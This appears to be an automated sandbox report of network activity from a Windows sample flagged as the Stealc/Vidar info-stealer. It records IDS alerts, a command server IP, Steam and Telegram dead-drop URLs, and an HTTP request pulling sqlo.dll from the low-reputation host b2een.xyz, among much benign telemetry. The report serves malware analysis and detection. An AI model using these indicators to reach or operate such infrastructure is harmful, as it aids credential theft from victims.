Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.13.32.95:443 -> 192.168.2.5:49746
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.13.32.95:443 -> 192.168.2.5:49740

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199802540894
Source: Malware configuration extractor	URLs: https://t.me/fu4chmo

Performs DNS queries to domains with low reputation

Source:

DNS query: b2een.xyz

Source: global traffic

HTTP traffic detected: GET /fu4chmo HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 13.107.246.63 13.107.246.63
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 23.96.180.189 23.96.180.189

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49998 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.147.1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0061688F InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_0061688F

Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CLr1vYdRECxUGOz&MD=ON2O2D6F HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fu4chmo HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /sqlo.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: b2een.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
